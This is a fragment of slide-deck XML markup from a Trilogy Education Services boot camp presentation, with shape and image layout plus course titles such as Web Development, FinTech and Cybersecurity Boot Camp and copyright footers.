          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="80" name="Google Shape;80;p3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81" name="Google Shape;81;p35"/>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2" name="Google Shape;82;p35"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="83" name="Google Shape;83;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1807557" y="3181867"/>
            <a:ext cx="6094420" cy="4509867"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Google Shape;84;p3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Data Boot Camp</a:t>
            </a:r>
            <a:endParaRPr sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Google Shape;85;p3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6" name="Google Shape;86;p3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87" name="Google Shape;87;p3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sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="Google Shape;88;p3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3"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1244" name="Google Shape;1244;p97"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="234686"/>
            <a:ext cx="23513873" cy="13256877"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13256877"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1245" name="Google Shape;1245;p9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246" name="Google Shape;1246;p9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247" name="Google Shape;1247;p9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9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9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50" name="Google Shape;1250;p9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51" name="Google Shape;1251;p9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52" name="Google Shape;1252;p9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3" name="Google Shape;1253;p97"/>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54" name="Google Shape;1254;p97"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5"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1256" name="Google Shape;1256;p98"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="234686"/>
            <a:ext cx="23513873" cy="13256877"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13256877"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1257" name="Google Shape;1257;p9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000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1258" name="Google Shape;1258;p9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000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="1259" name="Google Shape;1259;p9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9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9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9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3" name="Google Shape;1263;p9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4" name="Google Shape;1264;p9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7"/>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8"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1269" name="Google Shape;1269;p101"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1270" name="Google Shape;1270;p101"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="234686"/>
            <a:ext cx="23513873" cy="13256877"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13256877"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1271" name="Google Shape;1271;p10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272" name="Google Shape;1272;p10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273" name="Google Shape;1273;p10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10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10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6" name="Google Shape;1276;p10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7" name="Google Shape;1277;p10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8" name="Google Shape;1278;p10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9" name="Google Shape;1279;p10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80" name="Google Shape;1280;p10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81"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1282" name="Google Shape;1282;p102"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1283" name="Google Shape;1283;p102"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="234686"/>
            <a:ext cx="23513873" cy="13256877"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13256877"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1284" name="Google Shape;1284;p10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Confidential &amp; Proprietary Information of Trilogy Education Services, Inc.</a:t>
              </a:r>
              <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1285" name="Google Shape;1285;p10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Helvetica Neue"/>
                  <a:ea typeface="Helvetica Neue"/>
                  <a:cs typeface="Helvetica Neue"/>
                  <a:sym typeface="Helvetica Neue"/>
                </a:rPr>
                <a:t>© Trilogy Education Services, Inc.</a:t>
              </a:r>
              <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="1286" name="Google Shape;1286;p10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10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10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9" name="Google Shape;1289;p10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90" name="Google Shape;1290;p10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91" name="Google Shape;1291;p10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92" name="Google Shape;1292;p10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293" name="Google Shape;1293;p10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4"/>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5"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1296" name="Google Shape;1296;p104"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="234686"/>
            <a:ext cx="23513873" cy="13256877"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13256877"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1297" name="Google Shape;1297;p10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Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>Confidential &amp; Proprietary Information of Trilogy Education Services, Inc.</a:t>
              </a:r>
              <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1298" name="Google Shape;1298;p10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lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClr>
                  <a:srgbClr val="2E91A3"/>
                </a:buClr>
                <a:buSzPts val="4400"/>
                <a:buFont typeface="Arial"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2200" b="0" i="1" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:srgbClr val="2E91A3"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>© Trilogy Education Services, Inc.</a:t>
              </a:r>
              <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="1299" name="Google Shape;1299;p10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10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10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2" name="Google Shape;1302;p10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3" name="Google Shape;1303;p10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4" name="Google Shape;1304;p10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5" name="Google Shape;1305;p104"/>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3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1306" name="Google Shape;1306;p10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6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pic>
        <p:nvPicPr>
          <p:cNvPr id="1307" name="Google Shape;1307;p10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310"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1311" name="Google Shape;1311;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="118" b="119"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="18792305" y="2427400"/>
            <a:ext cx="4875530" cy="10092796"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1312" name="Google Shape;1312;p30"/>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13" name="Google Shape;1313;p30"/>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314" name="Google Shape;1314;p30"/>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marR="0" lvl="0" algn="l"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15" name="Google Shape;1315;p30"/>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16" name="Google Shape;1316;p3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317" name="Google Shape;1317;p30"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1318" name="Google Shape;1318;p30"/>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319" name="Google Shape;1319;p3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320"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1321" name="Google Shape;1321;p10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1322" name="Google Shape;1322;p10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10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
        <p:nvSpPr>
          <p:cNvPr id="1324" name="Google Shape;1324;p10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Web Development</a:t>
            </a:r>
            <a:endParaRPr sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1325" name="Google Shape;1325;p105"/>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1326" name="Google Shape;1326;p10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27" name="Google Shape;1327;p10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28" name="Google Shape;1328;p10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1329" name="Google Shape;1329;p105"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2069089" y="3283233"/>
            <a:ext cx="6094420" cy="4540334"/>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330"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1331" name="Google Shape;1331;p10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1332" name="Google Shape;1332;p10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10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UX/UI Design</a:t>
            </a:r>
            <a:endParaRPr sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1334" name="Google Shape;1334;p106"/>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1335" name="Google Shape;1335;p10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36" name="Google Shape;1336;p10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37" name="Google Shape;1337;p10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1338" name="Google Shape;1338;p106"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1558888" y="2822800"/>
            <a:ext cx="6825749" cy="5119304"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1339" name="Google Shape;1339;p10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89"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="90" name="Google Shape;90;p3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91" name="Google Shape;91;p3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 name="Google Shape;92;p36"/>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93" name="Google Shape;93;p3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FinTech</a:t>
            </a:r>
            <a:endParaRPr sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="Google Shape;94;p3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5" name="Google Shape;95;p3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96" name="Google Shape;96;p3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sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="Google Shape;97;p3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pic>
        <p:nvPicPr>
          <p:cNvPr id="98" name="Google Shape;98;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2436032" y="2786733"/>
            <a:ext cx="6212583" cy="6212583"/>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40"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1341" name="Google Shape;1341;p10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1342" name="Google Shape;1342;p10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49803"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>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0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Cybersecurity Boot Camp</a:t>
            </a:r>
            <a:endParaRPr sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1344" name="Google Shape;1344;p107"/>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1345" name="Google Shape;1345;p10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46" name="Google Shape;1346;p10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47" name="Google Shape;1347;p10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pic>
        <p:nvPicPr>
          <p:cNvPr id="1348" name="Google Shape;1348;p107"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1807557" y="3072384"/>
            <a:ext cx="6094420" cy="4509867"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1349" name="Google Shape;1349;p10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50"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1351" name="Google Shape;1351;p10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1352" name="Google Shape;1352;p10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53" name="Google Shape;1353;p108"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1354" name="Google Shape;1354;p108"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1807557" y="3181867"/>
            <a:ext cx="6094420" cy="4509867"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1355" name="Google Shape;1355;p10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Data Analytics and Visualization</a:t>
            </a:r>
            <a:endParaRPr sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1356" name="Google Shape;1356;p10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57" name="Google Shape;1357;p10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58" name="Google Shape;1358;p10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sp>
        <p:nvSpPr>
          <p:cNvPr id="1359" name="Google Shape;1359;p10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60"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1361" name="Google Shape;1361;p10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2" name="Google Shape;1362;p109"/>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9600"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="9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63" name="Google Shape;1363;p109"/>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500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="35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64" name="Google Shape;1364;p109"/>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65" name="Google Shape;1365;p10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366"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1367" name="Google Shape;1367;p110"/>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8" name="Google Shape;1368;p110"/>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marR="0" lvl="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="9600"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="9600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marR="0" lvl="1"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69" name="Google Shape;1369;p11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70" name="Google Shape;1370;p11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71"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1372" name="Google Shape;1372;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73" name="Google Shape;1373;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374" name="Google Shape;1374;p111"/>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375" name="Google Shape;1375;p11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376" name="Google Shape;1376;p111"/>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377" name="Google Shape;1377;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78" name="Google Shape;1378;p111"/>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379"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1380" name="Google Shape;1380;p11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81" name="Google Shape;1381;p112"/>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marR="0" lvl="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="9600"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="96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382" name="Google Shape;1382;p112"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="138" r="148"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3354260" y="3554200"/>
            <a:ext cx="3656648" cy="5338703"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1383" name="Google Shape;1383;p11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84" name="Google Shape;1384;p1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85"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1386" name="Google Shape;1386;p113"/>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387" name="Google Shape;1387;p11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1388" name="Google Shape;1388;p11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1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90" name="Google Shape;1390;p113"/>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marR="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="7200"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7200" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Instructor Demonstration</a:t>
            </a:r>
            <a:endParaRPr sz="7200" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1391" name="Google Shape;1391;p11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392" name="Google Shape;1392;p113"/>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93" name="Google Shape;1393;p113"/>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4"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1395" name="Google Shape;1395;p114"/>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396" name="Google Shape;1396;p11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97" name="Google Shape;1397;p114"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="21493494" y="10600400"/>
            <a:ext cx="1462660" cy="1935211"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
